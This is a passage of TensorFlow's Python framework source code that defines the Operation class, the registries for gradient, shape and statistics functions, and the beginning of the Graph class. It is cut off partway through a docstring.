else:
c_api.TF_AddInput(op_desc, op_input._as_tf_output())
# Add control inputs
for control_input in control_inputs:
c_api.TF_AddControlInput(op_desc, control_input._c_op)
# pylint: enable=protected-access
# Add attrs
for name, attr_value in node_def.attr.items():
serialized = attr_value.SerializeToString()
# TODO(skyewm): this creates and deletes a new TF_Status for every attr.
# It might be worth creating a convenient way to re-use the same status.
c_api.TF_SetAttrValueProto(op_desc, compat.as_str(name), serialized)
try:
c_op = c_api.TF_FinishOperation(op_desc)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
return c_op
@tf_export("Operation")
class Operation(object):
"""Represents a graph node that performs computation on tensors.
An `Operation` is a node in a TensorFlow `Graph` that takes zero or
more `Tensor` objects as input, and produces zero or more `Tensor`
objects as output. Objects of type `Operation` are created by
calling a Python op constructor (such as
@{tf.matmul})
or @{tf.Graph.create_op}.
For example `c = tf.matmul(a, b)` creates an `Operation` of type
"MatMul" that takes tensors `a` and `b` as input, and produces `c`
as output.
After the graph has been launched in a session, an `Operation` can
be executed by passing it to
@{tf.Session.run}.
`op.run()` is a shortcut for calling `tf.get_default_session().run(op)`.
"""
def __init__(self,
node_def,
g,
inputs=None,
output_types=None,
control_inputs=None,
input_types=None,
original_op=None,
op_def=None):
r"""Creates an `Operation`.
NOTE: This constructor validates the name of the `Operation` (passed
as `node_def.name`). Valid `Operation` names match the following
regular expression:
[A-Za-z0-9.][A-Za-z0-9_.\\-/]*
Args:
node_def: `node_def_pb2.NodeDef`. `NodeDef` for the `Operation`.
Used for attributes of `node_def_pb2.NodeDef`, typically `name`,
`op`, and `device`. The `input` attribute is irrelevant here
as it will be computed when generating the model.
g: `Graph`. The parent graph.
inputs: list of `Tensor` objects. The inputs to this `Operation`.
output_types: list of `DType` objects. List of the types of the
`Tensors` computed by this operation. The length of this list indicates
the number of output endpoints of the `Operation`.
control_inputs: list of operations or tensors from which to have a
control dependency.
input_types: List of `DType` objects representing the
types of the tensors accepted by the `Operation`. By default
uses `[x.dtype.base_dtype for x in inputs]`. Operations that expect
reference-typed inputs must specify these explicitly.
original_op: Optional. Used to associate the new `Operation` with an
existing `Operation` (for example, a replica with the op that was
replicated).
op_def: Optional. The `op_def_pb2.OpDef` proto that describes the
op type that this `Operation` represents.
Raises:
TypeError: if control inputs are not Operations or Tensors,
or if `node_def` is not a `NodeDef`,
or if `g` is not a `Graph`,
or if `inputs` are not tensors,
or if `inputs` and `input_types` are incompatible.
ValueError: if the `node_def` name is not valid.
"""
# For internal use only: `node_def` can be set to a TF_Operation to create
# an Operation for that op. This is useful for creating Operations for ops
# indirectly created by C API methods, e.g. the ops created by
# TF_ImportGraphDef. When `node_def` is a TF_Operation, all optional fields
# should be None.
if isinstance(node_def, node_def_pb2.NodeDef):
if node_def.ByteSize() >= (1 << 31) or node_def.ByteSize() < 0:
raise ValueError(
"Cannot create a tensor proto whose content is larger than 2GB.")
if not _VALID_OP_NAME_REGEX.match(node_def.name):
raise ValueError("'%s' is not a valid node name" % node_def.name)
c_op = None
elif type(node_def).__name__ == "SwigPyObject":
assert inputs is None
assert output_types is None
assert control_inputs is None
assert input_types is None
assert original_op is None
assert op_def is None
c_op = node_def
else:
raise TypeError("node_def needs to be a NodeDef: %s" % node_def)
if not isinstance(g, Graph):
raise TypeError("g needs to be a Graph: %s" % g)
self._graph = g
if inputs is None:
inputs = []
elif not isinstance(inputs, list):
raise TypeError("inputs needs to be a list of Tensors: %s" % inputs)
for a in inputs:
if not isinstance(a, Tensor):
raise TypeError("input needs to be a Tensor: %s" % a)
if input_types is None:
input_types = [i.dtype.base_dtype for i in inputs]
else:
if not all(
x.is_compatible_with(i.dtype)
for i, x in zip(inputs, input_types)):
raise TypeError("In op '%s', input types (%s) are not compatible "
"with expected types (%s)" %
(node_def.name, [i.dtype for i in inputs],
input_types))
# Build the list of control inputs.
control_input_ops = []
if control_inputs:
for c in control_inputs:
control_op = None
if isinstance(c, Operation):
control_op = c
elif isinstance(c, (Tensor, IndexedSlices)):
control_op = c.op
else:
raise TypeError("Control input must be an Operation, "
"a Tensor, or IndexedSlices: %s" % c)
control_input_ops.append(control_op)
# This will be set by self.inputs.
self._inputs_val = None
self._id_value = self._graph._next_id() # pylint: disable=protected-access
self._original_op = original_op
self._traceback = self._graph._extract_stack() # pylint: disable=protected-access
self._control_flow_context = self.graph._get_control_flow_context() # pylint: disable=protected-access
# Initialize self._c_op.
if c_op:
self._c_op = c_op
else:
if op_def is None:
op_def = self._graph._get_op_def(node_def.op)
# TODO(skyewm): op_def_library.apply_op() flattens the incoming inputs.
# Refactor so we don't have to do this here.
grouped_inputs = self._reconstruct_sequence_inputs(
op_def, inputs, node_def.attr)
self._c_op = _create_c_op(self._graph, node_def, grouped_inputs,
control_input_ops)
# Initialize self._outputs.
num_outputs = c_api.TF_OperationNumOutputs(self._c_op)
output_types = [
c_api.TF_OperationOutputType(c_api_util.tf_output(self._c_op, i))
for i in range(num_outputs)]
self._outputs = [
Tensor(self, i, output_type)
for i, output_type in enumerate(output_types)
]
self._graph._add_op(self) # pylint: disable=protected-access
if not c_op:
self._control_flow_post_processing()
def _control_flow_post_processing(self):
"""Add this op to its control flow context.
This may add new ops and change this op's inputs. self.inputs must be
available before calling this method.
"""
for input_tensor in self.inputs:
control_flow_util.CheckInputFromValidContext(self, input_tensor.op)
if self._control_flow_context is not None:
self._control_flow_context.AddOp(self)
def _reconstruct_sequence_inputs(self, op_def, inputs, attrs):
"""Regroups a flat list of input tensors into scalar and sequence inputs.
Args:
op_def: The `op_def_pb2.OpDef` (for knowing the input types)
inputs: a list of input `Tensor`s to the op.
attrs: mapping from attr name to `attr_value_pb2.AttrValue` (these define
how long each sequence is)
Returns:
A list of `Tensor`s (corresponding to scalar inputs) and lists of
`Tensor`s (corresponding to sequence inputs).
"""
grouped_inputs = []
i = 0
for input_arg in op_def.input_arg:
if input_arg.number_attr:
input_len = attrs[input_arg.number_attr].i
is_sequence = True
elif input_arg.type_list_attr:
input_len = len(attrs[input_arg.type_list_attr].list.type)
is_sequence = True
else:
input_len = 1
is_sequence = False
if is_sequence:
grouped_inputs.append(inputs[i:i + input_len])
else:
grouped_inputs.append(inputs[i])
i += input_len
assert i == len(inputs)
return grouped_inputs
def colocation_groups(self):
"""Returns the list of colocation groups of the op."""
default_colocation_group = [
compat.as_bytes("loc:@%s" % self.name)
]
try:
class_attr = self.get_attr("_class")
except ValueError:
# This op has no explicit colocation group, so it is itself its
# own root of a colocation group.
return default_colocation_group
attr_groups = [
class_name for class_name in class_attr
if class_name.startswith(b"loc:@")
]
# If there are no colocation groups in the explicit _class field,
# return the default colocation group.
return attr_groups if attr_groups else default_colocation_group
def values(self):
"""DEPRECATED: Use outputs."""
return tuple(self.outputs)
def _get_control_flow_context(self):
"""Returns the control flow context of this op.
Returns:
A context object.
"""
return self._control_flow_context
def _set_control_flow_context(self, ctx):
"""Sets the current control flow context of this op.
Args:
ctx: a context object.
"""
self._control_flow_context = ctx
@property
def name(self):
"""The full name of this operation."""
return c_api.TF_OperationName(self._c_op)
@property
def _id(self):
"""The unique integer id of this operation."""
return self._id_value
@property
def device(self):
"""The name of the device to which this op has been assigned, if any.
Returns:
The string name of the device to which this op has been
assigned, or an empty string if it has not been assigned to a
device.
"""
return c_api.TF_OperationDevice(self._c_op)
@property
def _output_types(self):
"""List this operation's output types.
Returns:
List of the types of the Tensors computed by this operation.
Each element in the list is an integer whose value is one of
the TF_DataType enums defined in c_api.h
The length of this list indicates the number of output endpoints
of the operation.
"""
num_outputs = c_api.TF_OperationNumOutputs(self._c_op)
output_types = [
c_api.TF_OperationOutputType(self._tf_output(i))
for i in xrange(num_outputs)
]
# In all the tests we have output_types that are passed into
# Operation.__init__ are a list of ints (which is illegal according
# to the docstring), but input_types are instances of DType.
# This extra assert is to catch if we ever use DType for output_types.
if output_types:
assert isinstance(output_types[0], int)
return output_types
def _tf_output(self, output_idx):
"""Create and return a new TF_Output for output_idx'th output of this op."""
tf_output = c_api.TF_Output()
tf_output.oper = self._c_op
tf_output.index = output_idx
return tf_output
def _tf_input(self, input_idx):
"""Create and return a new TF_Input for input_idx'th input of this op."""
tf_input = c_api.TF_Input()
tf_input.oper = self._c_op
tf_input.index = input_idx
return tf_input
def _set_device(self, device): # pylint: disable=redefined-outer-name
"""Set the device of this operation.
Args:
device: string or device.. The device to set.
"""
c_api.SetRequestedDevice(
self._graph._c_graph, # pylint: disable=protected-access
self._c_op, # pylint: disable=protected-access
compat.as_str(_device_string(device)))
def _update_input(self, index, tensor):
"""Update the input to this operation at the given index.
NOTE: This is for TF internal use only. Please don't use it.
Args:
index: the index of the input to update.
tensor: the Tensor to be used as the input at the given index.
Raises:
TypeError: if tensor is not a Tensor,
or if input tensor type is not convertible to dtype.
ValueError: if the Tensor is from a different graph.
"""
if not isinstance(tensor, Tensor):
raise TypeError("tensor must be a Tensor: %s" % tensor)
_assert_same_graph(self, tensor)
# Make sure output shapes are already computed for this op in case we create
# a cycle (we cannot compute shapes for cycles). Usually shapes are computed
# lazily upon request.
if not _USE_C_SHAPES:
set_shape_and_handle_data_for_outputs(self)
# Reset cached inputs.
self._inputs_val = None
c_api.UpdateEdge(
self._graph._c_graph, # pylint: disable=protected-access
tensor._as_tf_output(), # pylint: disable=protected-access
self._tf_input(index))
def _add_control_inputs(self, ops):
"""Add a list of new control inputs to this operation.
Args:
ops: the list of Operations to add as control input.
Raises:
TypeError: if ops is not a list of Operations.
ValueError: if any op in ops is from a different graph.
"""
for op in ops:
if not isinstance(op, Operation):
raise TypeError("op must be an Operation: %s" % op)
c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op) # pylint: disable=protected-access
def _add_control_input(self, op):
"""Add a new control input to this operation.
Args:
op: the Operation to add as control input.
Raises:
TypeError: if op is not an Operation.
ValueError: if op is from a different graph.
"""
if not isinstance(op, Operation):
raise TypeError("op must be an Operation: %s" % op)
c_api.AddControlInput(self._graph._c_graph, self._c_op, op._c_op) # pylint: disable=protected-access
def _remove_all_control_inputs(self):
"""Removes any control inputs to this operation."""
c_api.RemoveAllControlInputs(self._graph._c_graph, self._c_op) # pylint: disable=protected-access
def __str__(self):
return str(self.node_def)
def __repr__(self):
return "<tf.Operation '%s' type=%s>" % (self.name, self.type)
@property
def outputs(self):
"""The list of `Tensor` objects representing the outputs of this op."""
return self._outputs
# pylint: disable=protected-access
class _InputList(object):
"""Immutable input list wrapper."""
def __init__(self, inputs):
self._inputs = inputs
def __iter__(self):
return iter(self._inputs)
def __len__(self):
return len(self._inputs)
def __bool__(self):
return bool(self._inputs)
# Python 3 wants __bool__, Python 2.7 wants __nonzero__
__nonzero__ = __bool__
def __getitem__(self, i):
return self._inputs[i]
# pylint: enable=protected-access
@property
def inputs(self):
"""The list of `Tensor` objects representing the data inputs of this op."""
if self._inputs_val is None:
tf_outputs = c_api.GetOperationInputs(self._c_op)
# pylint: disable=protected-access
retval = [
self.graph._get_tensor_by_tf_output(tf_output)
for tf_output in tf_outputs
]
# pylint: enable=protected-access
self._inputs_val = Operation._InputList(retval)
return self._inputs_val
@property
def _inputs(self):
logging.warning("Operation._inputs is private, use Operation.inputs "
"instead. Operation._inputs will eventually be removed.")
return self.inputs
@_inputs.setter
def _inputs(self, value):
raise ValueError("Cannot assign _inputs")
@property
def _input_types(self):
num_inputs = c_api.TF_OperationNumInputs(self._c_op)
input_types = [
dtypes.as_dtype(c_api.TF_OperationInputType(self._tf_input(i)))
for i in xrange(num_inputs)
]
return input_types
@_input_types.setter
def _input_types(self, value):
raise ValueError("Cannot assign _input_types")
@property
def control_inputs(self):
"""The `Operation` objects on which this op has a control dependency.
Before this op is executed, TensorFlow will ensure that the
operations in `self.control_inputs` have finished executing. This
mechanism can be used to run ops sequentially for performance
reasons, or to ensure that the side effects of an op are observed
in the correct order.
Returns:
A list of `Operation` objects.
"""
control_c_ops = c_api.TF_OperationGetControlInputs_wrapper(self._c_op)
# pylint: disable=protected-access
return [
self.graph._get_operation_by_name_unsafe(
c_api.TF_OperationName(c_op)) for c_op in control_c_ops
]
# pylint: enable=protected-access
@property
def _control_outputs(self):
"""The `Operation` objects which have a control dependency on this op.
Before any of the ops in self._control_outputs can execute tensorflow will
ensure self has finished executing.
Returns:
A list of `Operation` objects.
"""
control_c_ops = c_api.TF_OperationGetControlOutputs_wrapper(self._c_op)
# pylint: disable=protected-access
return [
self.graph._get_operation_by_name_unsafe(
c_api.TF_OperationName(c_op)) for c_op in control_c_ops
]
# pylint: enable=protected-access
@property
def _control_inputs(self):
logging.warning("Operation._control_inputs is private, use "
"Operation.control_inputs instead. "
"Operation._control_inputs will eventually be removed.")
return self.control_inputs
@_control_inputs.setter
def _control_inputs(self, value):
logging.warning("Operation._control_inputs is private, use "
"Operation.control_inputs instead. "
"Operation._control_inputs will eventually be removed.")
# Copy value because it may be self._control_inputs_val (in particular if
# this is called from self._control_inputs += ...), and we don't want to
# clear value below.
value = copy.copy(value)
self._remove_all_control_inputs()
self._add_control_inputs(value)
@property
def type(self):
"""The type of the op (e.g. `"MatMul"`)."""
return c_api.TF_OperationOpType(self._c_op)
@property
def graph(self):
"""The `Graph` that contains this operation."""
return self._graph
@property
def node_def(self):
# pylint: disable=line-too-long
"""Returns the `NodeDef` representation of this operation.
Returns:
A
[`NodeDef`](https://www.tensorflow.org/code/tensorflow/core/framework/node_def.proto)
protocol buffer.
"""
# pylint: enable=line-too-long
with c_api_util.tf_buffer() as buf:
c_api.TF_OperationToNodeDef(self._c_op, buf)
data = c_api.TF_GetBuffer(buf)
node_def = node_def_pb2.NodeDef()
node_def.ParseFromString(compat.as_bytes(data))
return node_def
@property
def _node_def(self):
logging.warning("Operation._node_def is private, use Operation.node_def "
"instead. Operation._node_def will eventually be removed.")
return self.node_def
@property
def op_def(self):
# pylint: disable=line-too-long
"""Returns the `OpDef` proto that represents the type of this op.
Returns:
An
[`OpDef`](https://www.tensorflow.org/code/tensorflow/core/framework/op_def.proto)
protocol buffer.
"""
# pylint: enable=line-too-long
return self._graph._get_op_def(self.type)
@property
def _op_def(self):
logging.warning("Operation._op_def is private, use Operation.op_def "
"instead. Operation._op_def will eventually be removed.")
return self.op_def
@property
def traceback(self):
"""Returns the call stack from when this operation was constructed."""
return self._graph._convert_stack(self._traceback) # pylint: disable=protected-access
@property
def traceback_with_start_lines(self):
"""Same as traceback but includes start line of function definition.
Returns:
A list of 5-tuples (filename, lineno, name, code, func_start_lineno).
"""
return self._graph._convert_stack( # pylint: disable=protected-access
self._traceback,
include_func_start_lineno=True)
def _set_attr(self, attr_name, attr_value):
"""Private method used to set an attribute in the node_def."""
buf = c_api.TF_NewBufferFromString(
compat.as_bytes(attr_value.SerializeToString()))
try:
# pylint: disable=protected-access
c_api.SetAttr(self._graph._c_graph, self._c_op, attr_name, buf)
# pylint: enable=protected-access
finally:
c_api.TF_DeleteBuffer(buf)
def get_attr(self, name):
"""Returns the value of the attr of this op with the given `name`.
Args:
name: The name of the attr to fetch.
Returns:
The value of the attr, as a Python object.
Raises:
ValueError: If this op does not have an attr with the given `name`.
"""
fields = ["s", "i", "f", "b", "type", "shape", "tensor", "func"]
try:
with c_api_util.tf_buffer() as buf:
c_api.TF_OperationGetAttrValueProto(self._c_op, name, buf)
data = c_api.TF_GetBuffer(buf)
except errors.InvalidArgumentError as e:
# Convert to ValueError for backwards compatibility.
raise ValueError(str(e))
x = attr_value_pb2.AttrValue()
x.ParseFromString(data)
# Treat an empty oneof value as an empty list.
if not x.WhichOneof("value"):
return []
if x.HasField("list"):
for f in fields:
if getattr(x.list, f):
if f == "type":
return [dtypes.as_dtype(x) for x in list(getattr(x.list, f))]
else:
return list(getattr(x.list, f))
return []
else:
for f in fields:
if x.HasField(f):
if f == "type":
return dtypes.as_dtype(getattr(x, f))
else:
return getattr(x, f)
assert False, "Unsupported field type in " + str(x)
def run(self, feed_dict=None, session=None):
"""Runs this operation in a `Session`.
Calling this method will execute all preceding operations that
produce the inputs needed for this operation.
*N.B.* Before invoking `Operation.run()`, its graph must have been
launched in a session, and either a default session must be
available, or `session` must be specified explicitly.
Args:
feed_dict: A dictionary that maps `Tensor` objects to feed values.
See @{tf.Session.run}
for a description of the valid feed values.
session: (Optional.) The `Session` to be used to run to this operation. If
none, the default session will be used.
"""
_run_using_default_session(self, feed_dict, self.graph, session)
_gradient_registry = registry.Registry("gradient")
@tf_export("RegisterGradient")
class RegisterGradient(object):
"""A decorator for registering the gradient function for an op type.
This decorator is only used when defining a new op type. For an op
with `m` inputs and `n` outputs, the gradient function is a function
that takes the original `Operation` and `n` `Tensor` objects
(representing the gradients with respect to each output of the op),
and returns `m` `Tensor` objects (representing the partial gradients
with respect to each input of the op).
For example, assuming that operations of type `"Sub"` take two
inputs `x` and `y`, and return a single output `x - y`, the
following gradient function would be registered:
```python
@tf.RegisterGradient("Sub")
def _sub_grad(unused_op, grad):
return grad, tf.negative(grad)
```
The decorator argument `op_type` is the string type of an
operation. This corresponds to the `OpDef.name` field for the proto
that defines the operation.
"""
def __init__(self, op_type):
"""Creates a new decorator with `op_type` as the Operation type.
Args:
op_type: The string type of an operation. This corresponds to the
`OpDef.name` field for the proto that defines the operation.
"""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string")
self._op_type = op_type
def __call__(self, f):
"""Registers the function `f` as gradient function for `op_type`."""
_gradient_registry.register(f, self._op_type)
return f
@tf_export("NoGradient", "NotDifferentiable")
def NotDifferentiable(op_type):
"""Specifies that ops of type `op_type` is not differentiable.
This function should *not* be used for operations that have a
well-defined gradient that is not yet implemented.
This function is only used when defining a new op type. It may be
used for ops such as `tf.size()` that are not differentiable. For
example:
```python
tf.NotDifferentiable("Size")
```
The gradient computed for 'op_type' will then propagate zeros.
For ops that have a well-defined gradient but are not yet implemented,
no declaration should be made, and an error *must* be thrown if
an attempt to request its gradient is made.
Args:
op_type: The string type of an operation. This corresponds to the
`OpDef.name` field for the proto that defines the operation.
Raises:
TypeError: If `op_type` is not a string.
"""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string")
_gradient_registry.register(None, op_type)
# Alias for the old name, will be eventually removed.
NoGradient = NotDifferentiable
def get_gradient_function(op):
"""Returns the function that computes gradients for "op"."""
if not op.inputs:
return None
try:
op_type = op.get_attr("_gradient_op_type")
except ValueError:
op_type = op.type
return _gradient_registry.lookup(op_type)
_shape_registry = registry.Registry("shape functions")
_default_shape_function_registry = registry.Registry("default shape functions")
# These are set to common_shapes.call_cpp_shape_fn by op generated code
# (generated by python_op_gen.cc).
# It is set outside ops.py to avoid a circular dependency.
_call_cpp_shape_fn = None
_call_cpp_shape_fn_and_require_op = None
def _set_call_cpp_shape_fn(call_cpp_shape_fn):
"""Sets default shape fns from passed common_shapes.call_cpp_shape_fn."""
global _call_cpp_shape_fn, _call_cpp_shape_fn_and_require_op
if _call_cpp_shape_fn:
return # already registered
def call_without_requiring(op):
return call_cpp_shape_fn(op, require_shape_fn=False)
_call_cpp_shape_fn = call_without_requiring
def call_with_requiring(op):
return call_cpp_shape_fn(op, require_shape_fn=True)
_call_cpp_shape_fn_and_require_op = call_with_requiring
class RegisterShape(object):
"""No longer used. Was: A decorator for registering a shape function.
Shape functions must now be registered via the SetShapeFn on the
original Op specification in C++.
"""
def __init__(self, op_type):
"""Saves the `op_type` as the `Operation` type."""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string")
self._op_type = op_type
def __call__(self, f):
"""Registers "f" as the shape function for "op_type"."""
if f is None:
assert _call_cpp_shape_fn
# None is a special "weak" value that provides a default shape function,
# and can be overridden by a non-None registration.
try:
_default_shape_function_registry.register(_call_cpp_shape_fn,
self._op_type)
except KeyError:
# Ignore duplicate registrations of the weak value. This can
# occur if the op library input to wrapper generation
# inadvertently links in one or more of the standard op
# libraries.
pass
else:
_shape_registry.register(f, self._op_type)
return f
# TODO(b/74620627): remove when _USE_C_SHAPES is removed
def _set_shape_and_handle_data_for_outputs_c_api(op):
"""Set shapes and resource handle data using info from the C API."""
assert not _USE_C_SHAPES
for output in op.outputs:
output._shape_val = output._c_api_shape()
# Set the resource handle data for compatibility with the Python shape
# inference code.
serialized = c_api.GetResourceHandleShapeAndType(op._graph._c_graph,
output._as_tf_output())
if serialized:
output._handle_data = (
cpp_shape_inference_pb2.CppShapeInferenceResult.HandleData
.FromString(compat.as_bytes(serialized)))
else:
output._handle_data = None
# TODO(b/74620627): remove when _USE_C_SHAPES is removed
def set_shape_and_handle_data_for_outputs(op):
"""Set the shapes and resource handle data for op's outputs.
When _USE_C_SHAPES = False, this is lazily called when a tensor's shape is
first requested. Usually this should work automatically, but some edge cases
may require manually calling this first to make sure Tensor._shape_val and
Tensor._handle_data are set (e.g. manually overriding _handle_data, copying a
Tensor).
"""
if _USE_C_SHAPES: return
if op.graph._is_function(op.type):
for output in op.outputs:
output._shape_val = tensor_shape.unknown_shape()
return
try:
shape_func = _shape_registry.lookup(op.type)
except LookupError:
try:
shape_func = _default_shape_function_registry.lookup(op.type)
except LookupError:
shape_func = _call_cpp_shape_fn_and_require_op
shapes = shape_func(op)
if shapes is None:
raise RuntimeError(
"Shape function for op %s did not return any shapes" % op)
elif isinstance(shapes, dict):
# Returned by call_cpp_shape_fn
shapes_dict = shapes
shapes = shapes_dict["shapes"]
handle_datas = shapes_dict["handle_data"]
for output, handle_data in zip(op.outputs, handle_datas):
# Don't override any existing handle data that may have been manually set.
# pylint: disable=protected-access
if output._handle_data is None:
output._handle_data = handle_data
# pylint: enable=protected-access
if len(op.outputs) != len(shapes):
raise RuntimeError(
"Shape function for op %s returned %d shapes but expected %d %s %s" %
(op, len(shapes), len(op.outputs), shape_func.__name__, str(shapes)))
for output, s in zip(op.outputs, shapes):
output._shape_val = tensor_shape.unknown_shape()
output._shape_val = output._shape_val.merge_with(s)
class OpStats(object):
"""A holder for statistics about an operator.
This class holds information about the resource requirements for an op,
including the size of its weight parameters on-disk and how many FLOPS it
requires to execute forward inference.
If you define a new operation, you can create a function that will return a
set of information about its usage of the CPU and disk space when serialized.
The function itself takes a Graph object that's been set up so you can call
methods like get_tensor_by_name to help calculate the results, and a NodeDef
argument.
"""
def __init__(self, statistic_type, value=None):
"""Sets up the initial placeholders for the statistics."""
self.statistic_type = statistic_type
self.value = value
@property
def statistic_type(self):
return self._statistic_type
@statistic_type.setter
def statistic_type(self, statistic_type):
self._statistic_type = statistic_type
@property
def value(self):
return self._value
@value.setter
def value(self, value):
self._value = value
def __iadd__(self, other):
if other.statistic_type != self.statistic_type:
raise ValueError("Can't add an OpStat of type %s to one of %s." %
(self.statistic_type, other.statistic_type))
if self.value is None:
self.value = other.value
elif other.value is not None:
self._value += other.value
return self
_stats_registry = registry.Registry("statistical functions")
class RegisterStatistics(object):
"""A decorator for registering the statistics function for an op type.
This decorator can be defined for an op type so that it gives a
report on the resources used by an instance of an operator, in the
form of an OpStats object.
Well-known types of statistics include these so far:
- flops: When running a graph, the bulk of the computation happens doing
numerical calculations like matrix multiplications. This type allows a node
to return how many floating-point operations it takes to complete. The
total number of FLOPs for a graph is a good guide to its expected latency.
You can add your own statistics just by picking a new type string, registering
functions for the ops you care about, and then calling get_stats_for_node_def.
If a statistic for an op is registered multiple times, a KeyError will be
raised.
Since the statistics is counted on a per-op basis. It is not suitable for
model parameters (capacity), which is expected to be counted only once, even
if it is shared by multiple ops. (e.g. RNN)
For example, you can define a new metric called doohickey for a Foo operation
by placing this in your code:
```python
@ops.RegisterStatistics("Foo", "doohickey")
def _calc_foo_bojangles(unused_graph, unused_node_def):
return ops.OpStats("doohickey", 20)
```
Then in client code you can retrieve the value by making this call:
```python
doohickey = ops.get_stats_for_node_def(graph, node_def, "doohickey")
```
If the NodeDef is for an op with a registered doohickey function, you'll get
back the calculated amount in doohickey.value, or None if it's not defined.
"""
def __init__(self, op_type, statistic_type):
"""Saves the `op_type` as the `Operation` type."""
if not isinstance(op_type, six.string_types):
raise TypeError("op_type must be a string.")
if "," in op_type:
raise TypeError("op_type must not contain a comma.")
self._op_type = op_type
if not isinstance(statistic_type, six.string_types):
raise TypeError("statistic_type must be a string.")
if "," in statistic_type:
raise TypeError("statistic_type must not contain a comma.")
self._statistic_type = statistic_type
def __call__(self, f):
"""Registers "f" as the statistics function for "op_type"."""
_stats_registry.register(f, self._op_type + "," + self._statistic_type)
return f
def get_stats_for_node_def(graph, node, statistic_type):
"""Looks up the node's statistics function in the registry and calls it.
This function takes a Graph object and a NodeDef from a GraphDef, and if
there's an associated statistics method, calls it and returns a result. If no
function has been registered for the particular node type, it returns an empty
statistics object.
Args:
graph: A Graph object that's been set up with the node's graph.
node: A NodeDef describing the operator.
statistic_type: A string identifying the statistic we're interested in.
Returns:
An OpStats object containing information about resource usage.
"""
try:
stats_func = _stats_registry.lookup(node.op + "," + statistic_type)
result = stats_func(graph, node)
except LookupError:
result = OpStats(statistic_type)
return result
def _name_from_scope_name(name):
"""Returns the name of an op given the name of its scope.
Args:
name: the name of the scope.
Returns:
the name of the op (equal to scope name minus any trailing slash).
"""
return name[:-1] if (name and name[-1] == "/") else name
@tf_export("Graph")
class Graph(object):
"""A TensorFlow computation, represented as a dataflow graph.
A `Graph` contains a set of
@{tf.Operation} objects,
which represent units of computation; and
@{tf.Tensor} objects, which represent
the units of data that flow between operations.
A default `Graph` is always registered, and accessible by calling
@{tf.get_default_graph}.
To add an operation to the default graph, simply call one of the functions
that defines a new `Operation`:
```python
c = tf.constant(4.0)
assert c.graph is tf.get_default_graph()
```
Another typical usage involves the
@{tf.Graph.as_default}
context manager, which overrides the current default graph for the
lifetime of the context:
```python
g = tf.Graph()
with g.as_default():
# Define operations and tensors in `g`.
c = tf.constant(30.0)
assert c.graph is g
```
Important note: This class *is not* thread-safe for graph construction. All
operations should be created from a single thread, or external
synchronization must be provided. Unless otherwise specified, all methods
are not thread-safe.
A `Graph` instance supports an arbitrary number of "collections"
that are identified by name. For convenience when building a large
graph, collections can store groups of related objects: for
example, the `tf.Variable` uses a collection (named
@{tf.GraphKeys.GLOBAL_VARIABLES}) for
all variables that are created during the construction of a graph. The caller
may define additional collections by specifying a new name.
"""
def __init__(self):
"""Creates a new, empty Graph."""
# Protects core state that can be returned via public accessors, as well as
# synchronizes Session.run calls with methods that create and mutate ops
# (e.g. Graph.create_op()). This synchronization is necessary because it's
# illegal to modify an operation after it's been run. Thread-safety is
# provided on a best-effort basis to support buggy programs, and is not
# guaranteed by the public `tf.Graph` API.
#
# The lock must be reentrant because create_op can be called recursively due
# to control flow. Without a reentrant lock, many methods would also need a
# "locked" version or parameter (including generated code).
#
# NOTE(mrry): This does not protect the various stacks. A warning will
# be reported if these are used from multiple threads
self._lock = threading.RLock()
self._nodes_by_id = dict() # GUARDED_BY(self._lock)
self._next_id_counter = 0 # GUARDED_BY(self._lock)
self._nodes_by_name = dict() # GUARDED_BY(self._lock)
self._version = 0 # GUARDED_BY(self._lock)
# Maps a name used in the graph to the next id to use for that name.
self._names_in_use = {}
self._stack_state_is_thread_local = False
self._thread_local = threading.local()
# Functions that will be applied to choose a device if none is specified.
# After switch_to_thread_local(), self._thread_local._device_function_stack
# is used instead.
self._graph_device_function_stack = []
# Default original_op applied to new ops.
self._default_original_op = None
# Current control flow context. It could be either CondContext or
# WhileContext defined in ops/control_flow_ops.py
self._control_flow_context = None
# A new node will depend of the union of all of the nodes in the stack.
# After switch_to_thread_local(),
# self._thread_local._control_dependencies_stack is used instead.
self._graph_control_dependencies_stack = []
# Arbitrary collections of objects.
self._collections = {}
# The graph-level random seed
self._seed = None
# A dictionary of attributes that should be applied to all ops.
self._attr_scope_map = {}
# A map from op type to the kernel label that should be used.
self._op_to_kernel_label_map = {}
# A map from op type to an alternative op type that should be used when
# computing gradients.
self._gradient_override_map = {}
# True if the graph is considered "finalized". In that case no
# new operations can be added.
self._finalized = False
# Functions defined in the graph
self._functions = collections.OrderedDict()
# Default GraphDef versions
self._graph_def_versions = versions_pb2.VersionDef(
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER)
self._building_function = False
# Stack of colocate_with ops. After switch_to_thread_local(),
# self._thread_local._colocation_stack is used instead.
self._graph_colocation_stack = []
# Set of tensors that are dangerous to feed!
self._unfeedable_tensors = set()
# Set of operations that are dangerous to fetch!
self._unfetchable_ops = set()
# A map of tensor handle placeholder to tensor dtype.
self._handle_feeders = {}
# A map from tensor handle to its read op.
self._handle_readers = {}
# A map from tensor handle to its move op.
self._handle_movers = {}
# A map from tensor handle to its delete op.
self._handle_deleters = {}
# Allow optimizers and other objects to pseudo-uniquely key graphs (this key
# will be shared when defining function graphs, for example, so optimizers
# being called inside function definitions behave as if they were seeing the
# actual outside graph).
self._graph_key = "grap-key-%d/" % (uid(),)
# A string with the last reduction method passed to
# losses.compute_weighted_loss(), or None.
self._last_loss_reduction = None
self._container = ""
self._registered_ops = op_def_registry.get_registered_ops()
# TODO(skyewm): fold as much of the above as possible into the C
# implementation
if self._use_c_api_hack():
self._scoped_c_graph = c_api_util.ScopedTFGraph()
# The C API requires all ops to have shape functions. Disable this
# requirement (many custom ops do not have shape functions, and we don't
# want to break these existing cases).
c_api.SetRequireShapeInferenceFns(self._c_graph, False)
else:
self._scoped_c_graph = None
# TODO(apassos) remove once the C API is used by default.
def _use_c_api_hack(self):
"""Temporary hack; can be overridden to force C API usage."""
return _USE_C_API
def _convert_stack(self, stack, include_func_start_lineno=False):
"""Converts a stack extracted using _extract_stack() to a traceback stack.
Args:
stack: A list of n 5-tuples,
(filename, lineno, name, frame_globals, func_start_lineno).
include_func_start_lineno: True if function start line number should be
included as the 5th entry in return tuples.
Returns:
